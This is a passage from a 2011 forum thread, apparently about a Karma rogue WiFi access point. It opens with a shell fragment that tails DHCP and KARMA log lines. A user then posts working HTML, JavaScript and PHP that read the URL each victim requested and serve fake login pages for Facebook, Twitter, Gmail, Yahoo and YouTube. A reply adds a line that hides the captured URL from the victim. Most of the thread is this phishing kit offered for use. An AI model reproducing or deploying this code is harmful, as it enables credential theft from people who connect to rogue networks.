#------------------------------------------------------------------------------- logread -f | awk '{if ($0 ~ /(KARMA: |DHCPACK|DHCPDISCOVER|DHCPOFFER|DHCPREQUEST)/) {sub (/ \(.*\).*: /, ": ", $0); print $0 ;}} ' > /tmp/status.log & tail -f /tmp/status.log | /karma/bin/logwatch & } stop() { killall httpd } Quote Link to comment Share on other sites More sharing options...
bmccutch Posted August 1, 2011 Share Posted August 1, 2011 It looks like the "HTTP_HOST" variable isnt set by either this version of php or by the server (or whatever sets it lol) I threw together a quick rough fix for you though. I say rough because the victims will need to have javascript enabled... index.html <html> <head> </head> <body> <form action="index.php" method="POST" name="theform"> <input type="text" name="host" value=""/> </form> <script type="text/javascript"> document.theform.host.setAttribute("value",window.location); document.theform.submit(); </script> </body> </html> index.php (named it index.php because it doesnt redirect, it displays the contents of the phishing pages instead of redirecting to them) <?php error_reporting(0); $ref = $_POST['host']; if (strpos($ref, "facebook.com")) { include('facebook.html'); } else if (strpos($ref, "twitter.com")) { include('twitter.html'); } else if (strpos($ref, "gmail.com") || strpos($ref, "mail.google.com")) { include('gmail.html'); } else if (strpos($ref, "yahoo.com")) { include('yahoo.html'); } else if (strpos($ref, "youtube.com")) { include('youtube.html'); } else { include('peets.html'); } ?> That worked perfectly, great work. my only change was to avoid the textbox containing the url from being displayed by adding: document.theform.host.style.visibility='hidden'; <html> <head> </head> <body> <form action="index.php" method="POST" name="theform"> <input type="text" name="host" value=""/> </form> <script type="text/javascript"> document.theform.host.style.visibility='hidden'; document.theform.host.setAttribute("value",window.location); document.theform.submit(); </script> </body> </html> Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.